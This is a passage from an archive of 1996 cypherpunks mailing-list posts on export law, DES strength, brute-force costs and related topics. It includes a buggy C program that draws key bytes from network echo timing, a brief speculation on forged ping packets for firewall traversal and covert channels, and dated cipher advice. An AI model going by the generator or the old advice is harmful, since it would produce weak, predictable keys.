e-mail only deal).  Many thanks.

                                Carson Chittom

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSa83o+Yy0SubePBAQH0QQP/fC8w+IFsNF9azJ8NscZ02ET0Va3BBwKW
NoO+Z6+xJ3dEwFp9IBfNksUXGZ8fEOYikgtXxl6+PBz8Uui1Tr2uvqix9JuaJ75e
A5F6mGsj8kxXq/Q2gE6/AbDyAR21NqC6sNqr9q9sxXbGgcLy7h/G118bOW4foIK7
iPFnr9vTHRo=
=3m8H
-----END PGP SIGNATURE-----



~~~ PGPBLUE 3.0 <NR>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
               Dulcene decorumque pro patria mori?
Carson Chittom                                  carson.chittom@starnetbbs.com

"Tangerines?"               The amazing place was a seething, fertile
   Joseph Heller, _Catch-22_    cornucopia of female nipples and navels.
                                  Joseph Heller, _Catch-22_
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

... 43% of all statistics are totally worthless !!!

___ Blue Wave/QWK v2.20 [NR]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sun, 18 Feb 1996 14:28:14 +0800
To: cypherpunks@toad.com
Subject: CDA outside US (Including Indian Reservations)
In-Reply-To: <312698F2.777F@best.com>
Message-ID: <Pine.HPP.3.91.960218050207.9955A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



> So I think that indian reservation sovernignty has grown in recent 
> years, and would be very intresting course to pursue.

The problem with the CDA in this regard is that it doesn't seem to
respect other jurisdictions. It's very irritating for us in other
countries to know that if we put 'indecent' material on our world
readable sites, then we commit a crime in the US punishable with
2 years detention, even if chances of prosecution, extradition or
Noriega-style international arrest are minimal - so far; we all
know that there is now only one de-facto superpower, and that power
could do anything it really wishes to do. But USA still wants to
look good and possibly law-abiding on the global market of morality,
so I think the international legal system ought to be investigated,
by lawyers knowledgeable in the field, for possible processing of
the CDA in the International Court in the Hague (by a non-US person
or organization).

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@crl.com (Alan Westrope)
Date: Sun, 18 Feb 1996 22:57:12 +0800
To: cypherpunks@toad.com
Subject: Denver area meeting today, 2/18, 2 pm
Message-ID: <qJzJxo9g/sYZ088yn@crl.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The Usual Suspects will congregate today at the Tivoli, and may
visit Majordomo's Net Cafe or other sites of interest.  Anyone
who's not hanging out with Steve Jackson, Larry Niven, et al, at
the Lakewood Sheraton is welcome to drop by; send me a note if
you need directions.

N. B. -- The Tivoli was built in 1890 to brew Denver beer, Aspen
beer, Tivoli beer, etc., and is NOT affiliated with IBM!$%#&@! :-)


Alan Westrope     PGP public key:  http://www.nyx.net/~awestrop
<awestrop@nyx.net>
<awestrop@crl.com>
PGP 0xB8359639:   D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSc0hFRRFMq4NZY5AQEvvAQAqPy2YsGsbjiLz2vWvB0RPvdpcURCytRS
hgCNlbNdMIA5upDzIjhRW4YlkM73cfwl/PQBRy+maXNrNM1QYXVh4wh3khcJoRh1
kVPUNYycz3HaDIH/PFGojgzJXUFhcDhRvEtTsywfhkK8OvifnkFCXAOST8rrygip
n+FYY4taFTc=
=OhuU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 18 Feb 1996 20:33:37 +0800
To: ericd@shop.internet.net (Eric Davis)
Subject: Re: Using lasers to communicate
In-Reply-To: <v02130503ad4c7ab7db8a@[205.179.23.30]>
Message-ID: <96Feb18.071921edt.1172@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> That URL should be: httpd://www.lasercomm/lasercomm
http://www.lasercomm.com/lasercomm works for me.

I stand corrected.  I didn't realize that laser products like this
were available off-the-shelf.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an5877@anon.penet.fi (deadbeat)
Date: Sun, 18 Feb 1996 17:02:07 +0800
To: cypherpunks@toad.com
Subject: Re: Nyms with keys
Message-ID: <9602180836.AA18364@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

        Perhaps while you're lurking, you should consider downloading
	and installing a more recent version of PGP than version 2.4
	which you're still using.

WHat advantage is there to the more recent versions?  I'll tell you
what I like most about this version, it is paid for.

DEADBEAT <na5877@anon.penet.fi>


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBFAgUBMSYqT/FZTpBW/B35AQHlvQF8CULa2WkotQ29t7OaVduq8geDybE+PAcT
icDe5Ho59EWS+t3OqjsHJc/ECv+bthJY
=PNsK
-----END PGP SIGNATURE-----
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 18 Feb 1996 23:08:06 +0800
To: cypherpunks@toad.com
Subject: PUF_fup
Message-ID: <199602181438.JAA11773@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-18-96. NYT:

   "Nerds' Revenge: A How-To Manual. Silicon Valley Is Paved
   with Paper Fortunes, And Quick Ways To Enjoy them."

      A long look at how Netscapers are able to quickly get
      around stock locks and gorge on roadkills while
      predatory Wall Street and vulture banks eat their guts.
      Fancy cars and tacky houses are lampooned.

   "Internet Dreams: from $.10 to $30."

      A squint at creating instant wealth in the Cybercash
      puff-up.


   PUF_fup







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 19 Feb 1996 02:07:50 +0800
To: cypherpunks@toad.com
Subject: Re: Some thoughts on the Chinese Net
Message-ID: <199602181745.JAA08925@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:38 PM 2/14/96 -0500, Perry wrote:
>Jon Lasser writes:
>> The more complex portion (from my perspective, at any rate) is a 
>> modification of the standard TCP/IP protocol, requiring that each packet 
>> be signed by its originating user. This would require lots of software 
>> modification on the Chinese end, as well as a conversion process at the 
>> National firewall.
>
>They could use no stock software, and they would grind every machine
>in the country to its knees doing the signatures. RSA signatures
>aren't cheap.

Could you use IPv6 / IPSP authentication to do the job?  You'd obviously
need to create network software for the various operating systems,
but for most of them it's not a big change and various well-known people
are working on implementations :-)  You could get by with something
cheap like an RSA-signed key used for a MAC with either RC4 or MD5,
reducing the problem to one RSA signature per connection plus faster algorithms.
For email, that's probably still one signature per mail message, but it's
a manageable load...

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281

! Frank Zappa for President !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 19 Feb 1996 02:14:38 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: PING packets illegal?
Message-ID: <199602181745.JAA08949@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:20 PM 2/14/96 -0500, markm@gak [cute machine name :-] wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>> Concerning the ITAR ...... what would happen if some Evil Hacker Dude in,
>> say, England, decided to ICMP-ping a host in America? Nothing wrong with
>> that ...... but if those ping packets contained little pieces of something
>> like PGP ...... would the host being pinged be breaking the law? Would
>> all the hosts in the route between that host and the host in England that
>> was doing the ping also be breaking the law?
>
>Exporting encryption to the U.S. from another country is not illegal, only
>exporting from the U.S. is.  The method of transmissioni is irrelevant.  It
>does not matter if TCP packets or ICMP-ping packets are used to transmit the
>data. 

You missed the fun part of his post - it's that ping packets return the
data they were pinged with, so the US-end host is re-exporting components of
PGP.
>From a legal perspective, it's tough to assert that the US user had scienter,
given that it pings scarcely reach the machine's consciousness, much less
the human users', since they're handled by ICMP rather than by a user-space
TCP or UDP
socket.  (Obviously, if there's a sniffer around this is slightly different.)

Is it possible to send out forged ping packets, pinging machine B with a From
address of C (fake) instead of A (real), so that Alice can talk to China via
Bob?
If so, it might be an interesting method for traversing some firewalls,
and also (if you write a ping-collector program) for back-channel
communications.

If you want to really abuse the protocols, 53 bytes probably fits into the
64 you can send in a ping, so you could implement ATM-over-ICMP :-)

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281

! Frank Zappa for President !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 18 Feb 1996 23:39:59 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Using lasers to communicate
In-Reply-To: <v02130503ad4c7ab7db8a@[205.179.23.30]>
Message-ID: <199602181513.KAA32731@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


Lasers DO accomplish one task.

They force the interceptor to commit vulnerable forces to the attack.
It's pretty damn hard to get into room 24Z6 @ the Fort & prove that they
are working on YOUR text -- snatched in a phonetap.

It's a lot easier to catch the two guys on a bucket truck, or the Feebs
doing a black bag job on Ames' PC. That's exactly why TPTB prefer 
Option A, the FBI wiretap act, to B.

But a more interesting question, maybe for Brian. How DO the wiretap
laws treat non common-carrier communications -- be it YOUR wire strung
from Tom to Jerry's house, or such? And where does the FCC authority
stop, and whoever regulates laser-safety start? 

I vaguely recall that some BBC competitor was going to use the
wavelength loophole to get around the Beeb's monopoly... so the Crown
immediately raised the bar up to the gamma ray level or such.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 18 Feb 1996 23:50:28 +0800
To: cypherpunks@toad.com
Subject: Re: DES_ono
In-Reply-To: <9602180502.AA03842@su1.in.net>
Message-ID: <Pine.LNX.3.91.960218101940.220A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 18 Feb 1996, Frank Willoughby wrote:

> Two brief questions about DES, if I may.
> 
> I have heard of a couple of rumours that DES is considered to be fairly weak.  
> Specifically, the rumors mentioned that there were some questions about the 
> design of the S-boxes and the possibility that there was a trap door which 
> would permit the NSA or other gov't agency to quickly obtain the cleartext.

DES has been scrutinized for about 20 years.  If there are any trap doors in
the code, then they were built in very well.  DES is weak because of its short
key length, not because of any flaws in its design.  AFAIK, there is no
efficient way to crack 3des (encrypt, decrypt, encrypt).  3des has a 168-bit
key, so brute-force is not efficient.

>[...]
> 
> Assuming the rumours of the weakness of DES are true, which symmetric
> encryption algorithms would you recommend which are substantially more
> secure than DES (and which are obtainable from Internet or commercial
> sources)?  (It doesn't haver to be exportable).

IDEA and RC4 (with at least 128 bits) seem to be pretty secure.  If you really
don't trust DES or 3DES, IDEA is probably currently the best symmetric
encryption algorithm.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMSdFYrZc+sv5siulAQFclwP8C2KdGYd8ABRC3pTUV3Lvh6BIvq7Nxqf2
JELlEHqipX47PbBZkLSHqJOTFjcVxalZuXi3f0wthfpQXnTCcuo0msjKEyFuZZSp
wxDNysMzLkA5WyXw/XbPOVDgtSSoTNefR6Y3Wz593wkXAtg/GwtL4vjCAQFtKUhb
ngdgaIO9z8o=
=lEht
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 19 Feb 1996 00:02:54 +0800
To: cypherpunks@toad.com
Subject: Style Analyzer (was Re: Computer unmasks Anonymous writer)
In-Reply-To: <RurJxMNwPF7P084yn@netcom.com>
Message-ID: <Pine.LNX.3.91.960218104050.338B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Since I got more e-mails asking for the "style faking" program then I
expected, I have decided to put it on my homepage (mentioned in my .sig).
I will try to compile it for DOS, but I don't know how system dependant it is.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMSdJnbZc+sv5siulAQEVEgQAj4/HEorDRAHl8ncOfEYekRWo0/3a5357
FMQZn7ABpqxOXnVSAxlYeb84Y6yKg73gEeZUfbnn2LVCxBLr3lW5EeIpUgjI9AMt
fXTA6ExqcIEk+5249YKx9h+9eHbV+8iK/fAzVzV5oHoTyCV0K8B+Lmx2hCtYZPyG
fW2WSyW+ML8=
=iQO+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 19 Feb 1996 00:39:13 +0800
To: cypherpunks@toad.com
Subject: Numbers don't lie...
Message-ID: <960218111857.202256bd@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Have finally gotten around to reading the Jersey Seven paper on keylengths.
Is rather amazing since if anything they are being conservative with some
of their numbers - are using 30 Mhz for the FPGA where I have been using 40 
& using 200 Mhz for ASICs where I would use 300 (year and a half ago I used
150mhz based on what I knew *had* been built, not what I knew X-ray 
lithography is capable of.

In their figures, they do seem to gloss over a couple of minor points:

The most compelling to me is "how do you know when you broke it ?". Bruce
has always used the "known plaintext" approach, however using modern 
techniques for messaging, *every* message has a different session key,
negotiated using assymetric keying so the only message that will be broken
is one that you already have - not terribly helpful.

The second point is that their scalability seems to be based on costs per
chip alone, cost for which the engineering cost has been recovered and for
which the yeild is significant, hardly givens when you are talking pushing
the state of the art, given this 200 Mhz Pentiums would be U$10.00 also
(well, maybe U$25.00).

Finally, no cost is allocated to the sustem required to program/evaluate
the ponderings of these 100's of ASICs. As anyone who has ever programmed
a massively parallel computer (which is what they are talking about in their
brute force machine, it is the boundary communications that kill you.

True, each machine could operate on a specific portion of the keyspace with
bits fixed as a function of its address, but each will need to be loaded
with the plaintext to match and have some means to communicate success.

You also have to consider that dividing the keyspace may result in some
processors running slower than others due to the values used. Another minor
problem in parallel processors.

The cost is given of U$300,000 to build a SOA machine that could break DES
in 3 hours. Using the 200 Mhz (2*10^8) figure and assuming 1 trial per 
clock (being nice), a single chip will test 2.2*10^12 keys in that period.
2^55 is otoa 3.6*10^16 so will require 16,680 thingies running
in parallel. If they can get the chips for U$10, they will be able to 
allocate another whole U$10.00 per chip to the support structure and basic
programming to stay inside the budget. Since this will hardly be a 
production process, I suspect that the cost might be a tad higher.

Now often banking and EDI (as opposed to EC) does make the mistake of using 
the same key for more than one message. Similarly a firewall<>firewall
connection might beep a single keyed channel open for multiple sessions.
This would be at risk. But for individual messages.

The paper does make an appropriate observation: the cost is essentially
fixed per key (scaling is not perfect but can ignore that for the moment
- has to do with why Crays are circular and Grace's "nanosecond"). This means
that the strength of cryptography should be appropriate to the value of
the information protected. If less than U$10,000, the message is individually
encrypted, and has value only today, then DES is probably "good enough".

Strategic information of higher value arguably needs "more" but how much ?
64 bits is 256 times stronger than DES. This would indicate effective
security up to say U$2.5 million. More is better but I would not be quite
so alarmist nor would I dismiss the cost of engineering. Non-trivial.

Do agree that 40 bits is the same as no crypto at all (reminds me of Bob
Clampett's "No Bikini Atoll" but is another hobby entirely).

Still, at what point is it simply easier/cheaper to buy someone who knows 
the secret ?

						Warmly,
							Padgett

ps calculation made with a Sharp EL-5806 "scientific" calculator that is 
   probably older than some readers. If I dropped a digit, please let me know.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Sun, 18 Feb 1996 20:18:37 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: ITAR Amended to Allow Personal Use Exemptions
In-Reply-To: <199602162229.QAA28245@parka>
Message-ID: <m0to6NL-0006DcC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Adam" == Adam Shostack <adam@homeport.org> writes:

Adam> Since we don't need a license, what records are we supposed to
Adam> keep?

When IBM internally transfer crypto-software to locations outside US
they have to keep

* Name of sender + receiver
* date of transmission
* method of transmission


I'd assume that with this personal-use exection you have to keep the
date of your travel and the location(s) you traveled to.  (Your name
might be something you remember without keeping track of it ;-)

Olmur
- --
"If privacy is outlawed, only outlaws will have privacy" --- P. Zimmermann
      Please encipher your mail!  Contact me, if you need assistance.

finger -l mdeindl@eisbaer.bb.bawue.de for PGP-key
         Key-fingerprint: 51 EC A5 D2 13 93 8F 91  CB F7 6C C4 F8 B5 B6 7C


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMSb/fw9NARnYm1I1AQEz+gP/XWKkdOt0fAqj5YMqeME1c0dspXtxAVdx
/2vaXbZORJmqN2gSfqrgQ58F936vd2dDbBHa7pzxOpZ3OzXu/JsrhWvOEpyZI+bg
na0F2W4jjxvpS3h/2D6Aq92Q9zCsbQ0DC8Mz1N6auCk073M5oAvLcVeQFzMwEbWO
9dX/OuMwYjU=
=jWbc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 19 Feb 1996 00:47:56 +0800
To: frankw@in.net (Frank Willoughby)
Subject: Re: DES_ono
In-Reply-To: <9602180502.AA03842@su1.in.net>
Message-ID: <199602181633.LAA09963@homeport.org>
MIME-Version: 1.0
Content-Type: text


Frank Willoughby wrote:
| Specifically, the rumors mentioned that there were some questions about the 
| design of the S-boxes and the possibility that there was a trap door which 
| would permit the NSA or other gov't agency to quickly obtain the cleartext.

	This seems not to be true.  The design of the S boxes seems to
be to foil differential cryptanalysis, where pairs of similar texts
are encrypted to find information about the key.

| Another rumour was that the French & Israeli intelligence agencies downgraded
| the classification of DES to one of the lowest strengths of encryption
| algorithms.

	I wouldn't be suprised; major intelligence agencies are likely
to have DES cracking custom hardware.

| I have been wondering about these issues off & on for a while & have tried to 
| do some research on them, but have come up with nothing which would amount to 
See Schneier's Applied Cryptography, 2nd ed.

| Assuming the rumours of the weakness of DES are true, which symmetric
| encryption algorithms would you recommend which are substantially more
| secure than DES (and which are obtainable from Internet or commercial
| sources)?  (It doesn't haver to be exportable).

	I'd use IDEA or 3DES.  Again, see Schneier.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maruishi@netcom.com
Date: Mon, 19 Feb 1996 04:03:03 +0800
To: packrat@tartarus.uwa.edu.au
Subject: pseudo random: THE CODE
In-Reply-To: <199602181409.WAA01614@ratbox.rattus.uwa.edu.au>
Message-ID: <Pine.3.89.9602181140.A871-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 18 Feb 1996, Bruce Murphy wrote:

> In message <199602172002.MAA09152@netcom20.netcom.com>, 
>   maruishi@netcom.com wrote:
> > 
> > I was trying to think of a way to come up with true random numbers...
> > And knowing a bit of UNIX socket TCP/IP programming I made a small little
> > program that generates random numbers by measuring the mili-second timing ies
> >  a TCP packet to bounce back, from another network. 
> >   My program simply send some data to port 7 (echo port) of a network on an i
> > nternal list. Then timing it, randomly picks a different network to send to. 
> 
> Interesting idea. Trends may be externally visible, You would probably
> want to normalize it, and you would find that there was quite a few
> deterministic elements of network load -> delay.
> 
> Oh, did I mention clock granularity?
> 
> In short you really aren't going to get 'random numbers' from such a
> scheme, but that's not to say you couldn't have fun playing with it,
> you might even find some use for the ways of calculating immediate
> network load around a node. Especially with regard to interception of
> packets and allowing for time discrepancies whilst doing so.
> 
> Altogether off topic, but could maybe be developed into an idea with,
> maybe a 30% change of being Perrygrammed. Keep working.
> 
> <invisible to perry>
> Bounce me the code, could be interesting
> </invisible to perry>
> 
> --
> Packrat (BSc/BE;COSO;Wombat Admin)
> Nihil illegitemi carborvndvm.
> 
Here is the code. Its pretty quick and dirty.

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <time.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/time.h>
#include <time.h>

#define NET_NUM 1/*change this to the number of networks in
				the list below******************************/
struct timezone tz;
struct sockaddr_in addr;
unsigned int bits;

main(int argc, char **argv)
{
struct timeval tv;
register FILE *fin, *key, *nets;
int sock, c, dt, i, net;
unsigned char *packet;
unsigned char ch;

if(argc != 3)
{
printf("Usage: %s [key.file.path] [number of bits in key]\n", argv[0]);
exit(1);
} 
		if((key = fopen(argv[1], "wb")) == NULL)
		{
			perror("file open");
			exit(1);
		}
net = 1;
packet = (unsigned char *)malloc(16);/*you can of course change this value*/
memset(packet, "X", 16);
bits = atoi(argv[2]);
bits = bits / 8; /*how many bytes?*/
	for(i = 0; i<bits; i++)
	{
		sock = con(getn(net));/*Make a connection and return the 
socket.*/
		if((fin = fdopen(sock, "r")) == NULL)
		{
			perror("fdopen");
			close(sock);
			exit(1);
		}
		(void) gettimeofday(&tv, &tz);
sendto(sock,packet, 16, 0, (struct sockaddr *) &addr,sizeof(struct 
sockaddr));
		write(sock, "\r\n", 2);
		while ((c = getc(fin)) != '\n') ;
		dt = deltaT(&tv);
		close(sock);
		fclose(fin);
		ch = dt % 255;
		fputc(ch, key);
		net = dt % NET_NUM;
	}/*for*/
}

int con(char *where)
{
struct sockaddr_in addr;
struct hostent *host_;
register FILE *fin, *fp;
int sock, c, dt;
char *packet;
unsigned char ch;

(void) bzero((char *)&addr, sizeof(struct sockaddr_in));
	addr.sin_addr.s_addr = inet_addr(where);
	if((int)addr.sin_addr.s_addr == -1)
	{
			host_ = gethostbyname(where);
		if (host_ != NULL)
			bcopy(host_->h_addr, (char *)&addr.sin_addr, 
host_->h_length);
		else
			{
			printf("Host not found.\n");
			exit(1);
			}
	}
	addr.sin_family = AF_INET;
	addr.sin_port = htons(7);
		
		sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
		if (sock < 0) {
			fprintf(stderr,"error: socket() failed\n");
			perror("socket");
			return;
		}
	if(connect(sock, (struct sockaddr*) &addr, sizeof(addr))<0)
	{
		close(sock);
		fprintf(stderr, "socket connection error\n");
		perror("connection");
		exit(1);
	}
	return sock;
}

/**************put your network list down here************/
char *getn(int num)
{
char *nets[] = 
	{
	"127.0.0.1"
	};
return nets[num];
}

/*This part is taken from traceroute.*/
deltaT(tp)
struct timeval *tp;
{
	struct timeval tv;

	(void) gettimeofday(&tv, &tz);
	tvsub(&tv, tp);
	return (tv.tv_sec*1000 + (tv.tv_usec + 500)/1000);
}

tvsub(out, in)
register struct timeval *out, *in;
{
	if ((out->tv_usec -= in->tv_usec) < 0)   {
		out->tv_sec--;
		out->tv_usec += 1000000;
	}
	out->tv_sec -= in->tv_sec;
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 19 Feb 1996 01:16:31 +0800
To: cypherpunks@toad.com
Subject: Re: DES_ono
In-Reply-To: <199602181633.LAA09963@homeport.org>
Message-ID: <JX7HJD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
> | Assuming the rumours of the weakness of DES are true, which symmetric
> | encryption algorithms would you recommend which are substantially more
> | secure than DES (and which are obtainable from Internet or commercial
> | sources)?  (It doesn't haver to be exportable).
>
> 	I'd use IDEA or 3DES.  Again, see Schneier.

Or perhaps GOST 28147-89.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Sun, 18 Feb 1996 20:18:34 +0800
To: maruishi@netcom.com
Subject: Re: True random numbers
In-Reply-To: <86934.sharris@fox.nstn.ca>
Message-ID: <m0to6rJ-0006DcC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "M" == maruishi  <maruishi@netcom.com> writes:

M> Maybe another "random" source XORed with this? I don't know, just a
M> though.

Somewhere during developement of the Linux 1.3.* kernel a
"(pseudo-)random-number device" was introduced.  Perhaps the sources
of this can give you some ideas.

Have a nice day!

Olmur
- --
"If privacy is outlawed, only outlaws will have privacy" --- P. Zimmermann
      Please encipher your mail!  Contact me, if you need assistance.

finger -l mdeindl@eisbaer.bb.bawue.de for PGP-key
         Key-fingerprint: 51 EC A5 D2 13 93 8F 91  CB F7 6C C4 F8 B5 B6 7C


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMScG1Q9NARnYm1I1AQENqgP+O0qeiuyzYDBDsEgLxcy4e5eC1VVgskda
G45Gow9JHXzLuK+rV9SRLJFXRppM6mgQySop6SvikI+aCraKQK+XsqQEatQPdBHd
cGm5cw9wHf5PGEjmOksmRonbeh+y7AoNqkdwnSLD8NW4823pEKR7fPMB+UCcZj/g
xyhY42kUWvs=
=CSca
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Mon, 19 Feb 1996 02:58:11 +0800
To: cypherpunks@toad.com
Subject: Off-topic, but pertinent...
Message-ID: <Pine.3.89.9602181232.C21268-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Sun, 18 Feb 1996 01:00:06 -0800
From: Sun Angel Innovations <webmaster@sun-angel.com>
To: quotes@sun-angel.com
Subject: Daily Quote for Sunday, 18 February 1996

   If you resist reading what you disagree with, how will you ever
   acquire deeper insights into what you believe? The things most worth
   reading are precisely those that challenge our convictions.
   
                unknown
--
Sun Angel Innovations | http://www.sun-angel.com/ | info@sun-angel.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 19 Feb 1996 01:53:36 +0800
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson P.E. Information Security)
Subject: Re: Numbers don't lie...
In-Reply-To: <960218111857.202256bd@hobbes.orl.mmc.com>
Message-ID: <199602181735.MAA10219@homeport.org>
MIME-Version: 1.0
Content-Type: text


A. Padgett Peterson P.E. Information Security wrote:

| The second point is that their scalability seems to be based on costs per
| chip alone, cost for which the engineering cost has been recovered and for
| which the yeild is significant, hardly givens when you are talking pushing
| the state of the art, given this 200 Mhz Pentiums would be U$10.00 also
| (well, maybe U$25.00).

	Government agencies don't need to recover costs, they stick it
to the taxpayer.  Why was Clipper so cheap before it bombed?

| Finally, no cost is allocated to the sustem required to program/evaluate
| the ponderings of these 100's of ASICs. As anyone who has ever programmed
| a massively parallel computer (which is what they are talking about in their
| brute force machine, it is the boundary communications that kill you.
|
| True, each machine could operate on a specific portion of the keyspace with
| bits fixed as a function of its address, but each will need to be loaded
| with the plaintext to match and have some means to communicate success.
| 

	You just need to flag riase, not do real communication.  You
could use a tree structure to pass data back.  No need for 11
dimensional hypercube interconnects.  (Side note: Thinking Machines is
out of Chapter 11.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Mon, 19 Feb 1996 00:44:34 +0800
To: cypherpunks@toad.com
Subject: legality of forwarded packets (was: PING packets illegal?)
In-Reply-To: <199602150341.TAA16668@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9602181258.B6211-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain



> >> that ...... but if those ping packets contained little pieces of something
> >> like PGP ...... would the host being pinged be breaking the law? Would
> 
[zap!]
> 
> > the destination are violating the law.  Since it is impossible to monitor the
> > contents of every packet being transmitted over a network, I seriously doubt
> > that any intermediate host would be considered to be in violation of ITAR.

On an ecouraging note, I recall a Packet Radio case where someone posted 
what amounted to an advertisement for a 1-900 service.  Commercial 
advertisements being prohibited on all Ham Radio, the FCC moved to 
